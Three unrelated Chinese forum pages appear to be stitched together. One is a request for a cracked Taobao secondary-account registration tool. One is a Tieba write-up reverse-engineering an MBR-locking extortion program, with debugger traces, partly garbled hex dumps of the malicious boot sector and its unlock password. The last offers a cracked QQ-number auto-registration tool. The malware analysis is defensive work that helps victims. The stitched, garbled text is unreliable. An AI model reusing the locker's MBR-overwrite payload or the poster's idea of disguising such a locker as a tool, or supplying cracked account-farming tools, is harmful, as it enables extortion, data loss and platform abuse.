查看: 705|回复: 7
被重现江湖大神搞郁闷了 求个淘宝小号注册软件 靠谱的
今天刚进论坛的新人，看到论坛里好多帖子都是我需要的 都是重现江湖大牛弄的高兴死了&&一口气下了10+&&结果搞了一天 就一个能凑合用的 郁闷死 被大牛搞的体无完肤我的江湖币啊
希望哪位大牛帮我弄个淘宝小号注册机 不胜感激啊
& && && &希望论坛越办越好&&大神们给力啊
上一篇：下一篇：
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
抢沙发 嘿嘿&&大神们速度飞过啊 哦 对了 迅捷贝或谷跑 哪位大神能搞到
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
- -你去百度找找吧~
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
&成长值: 8335VIP6, 成长值 10800, 距离下一级还需 2465 成长值
破解不是100%能用
一切破解补丁仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途
还有请你看清楚使用说明。小号注册是需要硬件之类才能用的。
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
&成长值: 8205VIP6, 成长值 10800, 距离下一级还需 2595 成长值
作学习制作的
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
请要善用【论坛搜索】功能，那里可能会有你要找的答案！
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
老弟你弄到软件了吗&&现在。弄到了告诉我噢 一起交流
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
你用的是哪个小号注册机啊？我下载了那个2015新春版的，好像没有破解啊，不能用
发帖求助前要善用【论坛搜索】功能，那里可能会有你要找的答案，如果你在论坛求助问题，并且已经从坛友或者管理的回复中解决了问题，请把帖子标题加上【已解决】，如何回报帮助你解决问题的坛友，一个好办法就是给对方加江湖币！
就爱江湖论坛所发布的一切软件逆向分析文章及视频、破解补丁、注册机和注册信息，仅限用于学习和研究目的。不得将上述内容用于商业或者非法途径!否则，一切后果请用户自负!本站信息来自互联网，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请购买注册正版软件，获得正版优质服务!请重视此声明，法律不容忽视!E-Mail To:
( 湘ICP备号-1 )
Powered by Discuz! X3.2
Comsenz Inc.偶遇MBR敲竹杠“升级版”小小分析，大牛请慢飞过_病毒吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：57,813贴子：
偶遇MBR敲竹杠“升级版”小小分析，大牛请慢飞过收藏
贴吧遇到的样本，原受害者求助帖子“取于贴吧，归于贴吧，虽然我发帖会秒沉，但不管怎么说还是在贴吧发亲切点，写了几个小时来骗骗经验也好，教同我小白的你们怎么在加强壳的情况下OD＋IDA分析这种所谓升级版的小病毒尽量一步步说明”
作者：自己手打
（让我水水贴可好）
声明: 冒泡一下，只是感兴趣，没有其他目的。不是专业分析的，请大牛多多指点
样本发现日期：
样本类型：
一般这种杀软直接报壳，小白我也不清楚该叫什么，差不多是AddPass
D:\Program Files\Desktop\A-AV集\锁机.exe大小：
1, 380, 352 字节
(1.31 MB)修改时间：1:01:38MD5：
8E3FCA7E253FC9B8F0E2775SHA1： 6AAAA495E8E5349E3FCBCB9D225ECA5CRC32：3FADF78A壳信息：VMProtect v.1.6x - 2.03
文件系统变化:
修改MBR样本会简单粗暴的修改下MBR，导致开机进不去系统，乘机索取，敲诈样本加了VMP强壳，技术菜脱不了
数据窗口跟随401000，以反汇编形式显示，看看代码是否解码完毕细节不多说，CTRL+G 输入VirtualProtect 回车后在VirtualProtectEx处下断F9运行至堆栈窗口出现PAGE_READONLY时候取消软件断点 ，也可以看到数据窗口已经解码完毕或者下断API GetVersion 运行几次后取消断点继续下面步骤按照经验可以看出程序为易语言所写反汇编窗口跟随 401000此处地址，OD二进制搜索 FF25 来到易语言启动时候一般会调用的call处0040262A
mov eax, 0x60040262F
call 锁机.
E8 ECFFFFFF
call 锁机.0040263C
push 锁机.
mov eax, 0x3
call 锁机.0040264B
add esp, 0x40040264E
E8 46FFFFFF
call 锁机.
call 锁机.0040266E0040265D
add esp, 0x4
call 锁机.
xor eax, eax
retn 不过此时可以看得出并没有什么大的卵用
继续CLRL+B搜索二进制#FF55FC5F5E#(#号中是易语言的按钮事件特征码)搜索到了下断即可运行后断下，F7进去跟踪代码还算整齐只是加花了，话说都加VMP了，居然不加SDK也是无语… 这一代码函数段不长，跟几下就显示出字符串了莫名的字符串，很重要 0040104E
B8 64E25500
mov eax, 锁机.
ASCII&QQ:& 继续下去，00401F61处有个call进去分析动态调试 程序会调用CreateFileA打开磁盘进行READ操作 402081
/CALL 到 CreateFileA来自 锁机.0040207C55E540
|FileName =&\\.\\physicaldrive0&0012FC7C
|Access = GENERIC_READ000001
|ShareMode =FILE_SHARE_READ000000
|pSecurity = NULL000003
|Mode = OPEN_EXISTING0012FC8C
|Attributes = NORMAL000000
\hTemplateFile = NULL 设置文件当前的读取位置402105
/CALL 到SetFilePointer 来自锁机.000104
(window)000000
|OffsetLo = 0x00012FC8C
|pOffsetHi = NULL000000
\Origin = FILE_BEGIN
/CALL 到 ReadFile 来自 锁机.000104
|hFile = (window)1D1000
|Buffer = 001D1000000200
|BytesToRead = 200(512.)0012FC8C
|pBytesRead = 0012FCA8000000
\pOverlapped = NULL MBR总共就512字节，只是读了部分200(512.)
读出来ReadFile执行后在Buffer = 001D1000跟随数据窗口下面就是我电脑上的MBR上读出来的了 001D 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C
3缼屑.|鸓P|001D1010 BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04
?PW瑰螭私??001DE 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5
8n.|.u兣怍?嬽001D 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B
兤It8,t鳗??001D1040 F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88
瓞&.t.??腧001D E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B
N铁.s*﨔~t001DE 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83
~.t牰u襽F001D 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB
F僔..?.s牰001D1080 BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0
紒&U猼~.t葼001D EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56
?氅孅‑W嬽丝.奦001D10A0 00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC
.??r#娏$?槉迠001D10B0 43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56
C縻嬔喼?翌B麾9V001D10C0 0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C
.w#r9Fs??|001D10D0 8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A
婲媀.?sQOtN2鋳001D10E0 56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD
V.?脘奦.`华U碅001D10F0 13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60
r6侞U猽0隽t+a`001D 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A
j.j.v.vj.h.|j001DA 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B
j碆嬼?aasOt001D 8A 56 00 CD 13 EB D6 61 F9 C3 49 6E 76 61
2鋳V.?胫aInva001D 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61
lid partition ta001DC 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E
ble.Error loadin001D 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74
g operating syst001DD 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61
em.Missing opera001D 6E 67 20 73 79 73 74 65 6D 00 00 00 00 00
ting system.....001D 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001D 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001D11A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001D11B0 00 00 00 00 00 2C 44 63 DB 50 DC 50 00 00 80 01
.....,Dc跴踌..001D11C0 01 00 07 FE F8 FF 38 00 00 00 60 4D 19 01 00 FE
.8...`M.001D11D0 F8 FF 0F FE F8 FF 98 4D 19 01 98 5F 06 02 00 00
?楳榑..001D11E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001D11F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
..............U55AA结束标志
上面几步读取正常的话就会关闭句柄，进行下一步操作，否则就会关机0012FC8C
/CALL 到 CloseHandle来自 锁机.004022AB000104
\hObject = (window)
E8 BB060000
call 锁机.00401F61主要就是读取MBR信息
mov dword ptrss:[ebp-0x24], eax读取失败的话会关机，关机函数说明在下方（不知道你们会不会看得无聊）
三叔正版授权网游公测！
重发了一帖，终于能发了，继续贴，大牛请路过
之后会在00401A72
push eax一个参数 ，eax指向读数据出来的缓存区00401A72
push eax00401A73
push 0x100401A78
mov eax, 0x300401A7D
BB E0D34500
mov ebx, 锁机.00401A82
E8 050C0000
call 锁机.0040268C00401A87
add esp, 0x10 经过算法运算后返回值出现44d990ce2a4b627ef109
b5ab73c25cf478c6a7a600401AEA
push dword ptrss:[ebp-0x24]00401AED
E8 53F7FFFF
call 锁机.00401AF2
add esp, 0x800401AF5
cmp eax, 0x000401AF8
mov eax, 0x000401AFD
sete al00401B00
mov dword ptrss:[ebp-0x2C], eax然后比较两串字符串｛44d990ce2a4b627ef109b5ab73c25cf478c6a7a6
判断是否已经加锁，否则出现“你的硬盘已经加锁，请重启计算机生效！！！”
B8 40E55500
mov eax, 锁机.
\\.\\physicaldrive0 打开底层磁盘写操作402428
/CALL 到 CreateFileA来自 锁机.0012FC7C
|FileName =&\\.\\physicaldrive0&000000
|Access = GENERIC_WRITE000001
|ShareMode =FILE_SHARE_READ000000
|pSecurity = NULL0012FC8C
|Mode = OPEN_EXISTING000080
|Attributes = NORMAL000000
\hTemplateFile = NULL
设置磁盘读取位置在400偏移的地方4024A1
/CALL 到SetFilePointer 来自锁机.0040249C000104
|hFile = (window)0012FC8C
|OffsetLo = 400 (1024.)000000
|pOffsetHi = NULL000000
\Origin = FILE_BEGIN
/CALL 到 WriteFile 来自 锁机.0040251B000104
|hFile = (window)1C60A8
|Buffer = 001C60A80012FC8C
|nBytesToWrite = 200(512.)12FCA8
|pBytesWritten =0012FCA8000000
\pOverlapped = NULL 开始写文件了。。。200文件容易经我观察是跟之前ReadFile的数据一样的保存作用，作者备份了MBR在偏移量400 (1024.)处的地方，进系统后恢复可用
001C60A8 33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C
3缼屑.|鸓P|001C60B8 BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04
?PW瑰螭私??001C60C8 38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5
8n.|.u兣怍?嬽001C60D8 83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B
兤It8,t鳗??001C60E8 F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88
瓞&.t.??腧001C60F8 4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B
N铁.s*﨔~t001CE 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83
~.t牰u襽F001C 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB
F僔..?.s牰001C6128 BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0
紒&U猼~.t葼001C EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56
?氅孅‑W嬽丝.奦001C 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC
.??r#娏$?槉迠001C E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56
C縻嬔喼?翌B麾9V001C 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C
.w#r9Fs??|001CE 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A
婲媀.?sQOtN2鋳001C CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD
V.?脘奦.`华U碅001C 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60
r6侞U猽0隽t+a`001C61A8 6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A
j.j.v.vj.h.|j001C61B8 01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B
j碆嬼?aasOt001C61C8 32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 49 6E 76 61
2鋳V.?胫aInva001C61D8 6C 69 64 20 70 61 72 74 69 74 69 6F 6E 20 74 61
lid partition ta001C61E8 62 6C 65 00 45 72 72 6F 72 20 6C 6F 61 64 69 6E
ble.Error loadin001C61F8 67 20 6F 70 65 72 61 74 69 6E 67 20 73 79 73 74
g operating syst001CD 00 4D 69 73 73 69 6E 67 20 6F 70 65 72 61
em.Missing opera001C 6E 67 20 73 79 73 74 65 6D 00 00 00 00 00
ting system.....001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001C 00 00 00 2C 44 63 DB 50 DC 50 00 00 80 01
.....,Dc跴踌..001C 07 FE F8 FF 38 00 00 00 60 4D 19 01 00 FE
.8...`M.001C6278 F8 FF 0F FE F8 FF 98 4D 19 01 98 5F 06 02 00 00
?楳榑..001C 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001C 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
..............U
E8 7E070000
call 锁机.0040231B跟踪之后发现这个CALL是保存MRB有关数据
又打开磁盘 402428
/CALL 到 CreateFileA来自 锁机.0012FC7C
|FileName =&\\.\\physicaldrive0&000000
|Access = GENERIC_WRITE000001
|ShareMode =FILE_SHARE_READ000000
|pSecurity = NULL0012FC8C
|Mode = OPEN_EXISTING000080
|Attributes = NORMAL000000
\hTemplateFile = NULL
physicaldrive0物理驱动器
mbr:\\.\physicaldrive0 4024A1
/CALL 到SetFilePointer 来自锁机.0040249C000104
|hFile = (window)0012FC8C
|OffsetLo = 0x0000000
|pOffsetHi = NULL000000
\Origin = FILE_BEGIN偏移量设置为0，要开始写了 402520
/CALL 到 WriteFile 来自 锁机.0040251B000104
|hFile = (window)1BB4D8
|Buffer = 001BB4D80012FC8C
|nBytesToWrite = 200(512.)12FCA8
|pBytesWritten =0012FCA8000000
\pOverlapped = NULL
数据窗口DUMP跟随查看Buffer 001BB4D8 E9 00 00 8C C8 8E D8 8E D0 8E C0 BC 00 01 BD ED
?.屓庁幮幚?巾001BB4E8 7C BB ED 7C E8 B0 00 89 C1 B8 01 13 BB 0C 00 B2
|豁|璋.壛??.001BB4F8 00 CD 10 B8 00 B8 05 A0 00 8E D8 31 C9 31 DB 31
.????庁1??001BB508 C0 CD 16 3C 08 74 13 3C 0D 74 1B B4 02 88 07 88
劳&t&.t??001BB518 67 01 81 C3 02 00 41 E9 E5 FF 81 EB 02 00 49 31
g伱.A殄侂.I1001BB528 C0 89 07 E9 D9 FF 8C C8 8E C0 31 DB BE DA 7C 2E
缐橘屓幚1劬趞.001BB538 8A 0E D9 7C B5 00 3E 8A 07 26 8A 24 38 E0 75 31
?质?&?&?8邹1001BB548 81 C3 02 00 46 E2 EF 31 C0 B8 00 7E 8E C0 31 DB
伱.F怙1栏.~幚1001BB558 B4 02 B2 80 B0 01 B6 00 B5 00 B1 03 CD 13 31 DB
?睑?????1001BB568 B2 80 B4 03 B0 01 B6 00 B5 00 B1 01 CD 13 E9 1D
睑???????001BB578 00 BB 00 B8 81 C3 38 00 B0 58 88 07 2E 8B 0E D9
.?竵?.疖?.?001BB588 7C 31 C0 89 07 81 C3 02 00 E2 F8 E9 45 FF B8 FF
|1缐伱.怿镋?001BB598 FF 50 B8 00 00 50 CB 51 53 3E 8A 0F 80 F9 00 74
P?.P薗S&??t001BB5A8 05 43 40 E9 F3 FF 59 5B C3 0F 78 69 61 6F 79 61
C@轶Y[?xiaoya001BB5B8 6F 72 75 61 6E 6A 69 61 6E 00 00 00 00 51 51 3A
oruanjian....QQ:001BB5C8 38 37 34 34 38 32 39 38 00 76 65 20 61 20 6C 6F
.ve a lo001BB5D8 63 6B 21 21 21 50 6C 65 61 73 65 20 65 6E 74 65
ck!!!Please ente001BB5E8 72 20 74 68 65 20 75 6E 6C 6F 63 6B 20 70 61 73
r the unlock pas001BB5F8 73 77 6F 72 64 00 00 00 00 00 00 00 00 00 00 00
sword...........001BB608 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001BB618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001BB628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001BB638 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
................001BB648
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB658
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB668
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB678
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB688
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB698
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB6A8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB6B8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000
................001BB6C8
00 00 00 00 00 00 00 00 00 00 00 00 00 00 55AA
..............U 准备写的数据如上 用WinHEX打开物理磁盘看看 等等贴工具下载地址打开物理磁盘驱动器提取出来数据，OD二进制复制，WinHEX新建200字节，粘贴选择ASCLL HEX 格式也可以用C32新建十六进制文件编辑-&特别粘贴
弄好之后保存bin文件拉入IDA Pro 选择16位分析模式进行分析（后续 JMP @@） 接着样本关闭了文件句柄402554
/CALL 到 CloseHandle来自 锁机.0040254F000104
\hObject = (window)
E8 4C070000
call 锁机.0040231B写MBR的还是这个CALL看来功能是写MBR写的位置由前面的00401BC2
lea eax, dword ptrss:[ebp-0x10]00401BC5
push eax参数推进去的一个参数eax所决定 修改完MBR之后OD反汇编窗口居然还出现了一行字符串…
B8 1FE55500
mov eax, 锁机.0055E51F 加锁完毕，请重启计算机！00401BDE
push eax看得出作者很人性化而且在这个样本打开时候还带有音乐的，只是在单步调试过程中没欣赏到 继续F8单步下去
jnb short 锁机.004010EC004010EB
mov ebp, dword ptrds:[eax+0x1]004010EE
add byte ptrds:[eax], al
add byte ptrds:[eax+0x1], ch
add eax, dword ptrds:[eax]
806A 00 EB
sub byte ptrds:[edx], 0xEB
add dword ptrds:[edx+0x268], eax004010FF
add byte ptrds:[eax+0x2], ch
add byte ptrds:[eax], al
add byte ptrds:[eax+0x1], bh0040110A
BB 80CF4500
mov ebx, 锁机.0045CF800040110F
call 锁机.0040268C这里走过去就关机了主程序走完了木有了
add esp, 0x1C
mov esp, ebp
/CALL 到 ExitWindowsE关机api，提前下断 |Options = EWX_REBOOT|EWX_FORCE \Reserved = 0x0
//*********************************下面是上IDA Pro神器分析关键的MBR感染数据
打开WinHEX的编辑磁盘功能，选中其中的物理磁盘不要小看我电脑磁盘容量可以轻易看出MBR已经被修改了，但是此时还没关机，因为在执行ExitWindowsEx关机api时候我已经retn干掉关机了 @@:
将之前提取出来MBRdump出来的数据拉到C32ASM或IDA中C32ASM包含数据如上IDA如果显示数据的话就在键盘按下C键（相当于OD的Ctrl+A）
本来还可以IDA上动态调试MBR的，我的计算机配置渣，技术也菜，就下次再继续研究好了记得选否 ; - VIDEO - WRITE STRING(AT,XT286,PS,EGA,VGA)seg000:0021
AL =mode, BL = attribute if AL bit 1 clear, BH = display page numberseg000:0021
DH,DL = row,column of starting cursor position, CX = length of stringseg000:0021
ES:BP -& start of string
seg000:00BEseg000:00BE loc_BE:
CODE XREF:seg000:009Ejseg000:00BE
ax, 0FFFFhseg000:00C1
axseg000:00C2
ax, 0seg000:00C5
axseg000:00C6
retf将就对照这IDA的英语看吧，MBR小白我也不懂 如果输入错误的密码就重启了关键字符串在图中，聪明的你们可能已经猜出密码究竟是什么了吧
比较字符串
重点在于MBR写入的那堆二进制数，MBR和汇编又不懂，暂时就这样吧这能看出是高手写的，然而我觉得却并不是那个病毒作者写的
重启之后的开机桌面如那个受害者一样分析IDA数据后得出密码就是xiaoyaoruanjian（猜也能猜到了。。。）输进去OK，可以了PS：写这种并不难我已经准备写了。。。有的是源码，然后写好后名字就叫XX刷机，XX轰炸机
最后防范方法：不要轻信网上下载的黑工具，不要贪心，本来病毒是很少会加VMP这种强壳的，因为就算本身不是病毒，加强壳都很容易会被杀软盯上。就算要用，最好也在虚拟机中使用，准备好个U盘PE系统也好 解决方法：开机出现那个QQ：的就用键盘输入密码&xiaoyaoruanjian&回车键即可进入系统，还原MBR，样本有保存MBR，或者用ARK工具，修复下MBR 有中相同病毒的情况下，希望网友可以从此贴搜到解决方法 果真我发帖太渣没人看
昨天就写好的了，分析最多用了半小时，写个帖子好几小时我去。。。可惜没早发现，
帮不到你但是你要过来啦，说好的助攻呢
《盗墓笔记》十年之约,震撼揭秘真实地下世界
我不会说以前我一直默默滴看王And木牛的帖子甚至是他博客也看了些完贴了，病毒吧好多是来求助的，就需要多一些人去水贴嘛
资兹技术贴
此贴求助的一律删除别以为敲竹杠有关的就会帮你破解
不一一@了来助攻要升级了么么哒
两个不是妹纸的货快过来水贴
666，助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻助攻，没找到尼玛就是xiaoyaoruanjian，那个作者的论坛居然还说密码仅仅在整点有效，，，，
楼主你解释一下’A-AV集’这个文件夹里面是什么
其实你是什么专业的，我好好奇
合照一张！
OD是啥。并不会用
飞洒大大一直深藏不漏，平时在群里装小白我也是笑了。秘密我帮你保守的怎样？
好厉害的样子～
刚刚看了下VMP加壳居然不加密IAT一不小心就手脱成功了，PS：可以做下VMP脱壳练习
为嘛用了OD
又用IDA 难道OD看不到密码？
不是说vmp壳
很牛X吗 ？直接被脱了
看来楼主更厉害
不明觉厉～～
没人调戏作者不科学
Ghex大法好
楼主辛苦了，把15、21楼俩妹子送你了
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或手机签到经验翻倍！快来扫一扫！
QQ靓号申请器管家 V5.3破解版
559524浏览 / 30回复
本软件采用全自动自动提交方法，主要针对qq申请，全自动宽带连接，cookies清理等，做到了5秒申请一个qq，功能强大，安全、方便。 占用低，打开软件后直接输入验证码即可，号码申请后会自动保存在myqq.txt文本。点我下载
现在不能用了吧，如果有更新的版本，可以发上来和大家分享，
&&&&& 看看&&&&&&& 先
这个现在还可以用？？
对 楼主 yyyhhhid 说：＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝支持一下
持怀疑态度，先下下先
支持一下 ……
到底能还是不能啊
对 楼主 yyyhhhid 说：＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝太牛了
下了的朋友也不说下能用不？
多谢楼主分享！
支持键盘翻页 ( 左右 )&
您需要登录后才可以回帖&&&|&&&&&
用户名/注册邮箱/注册手机号
其他第三方号登录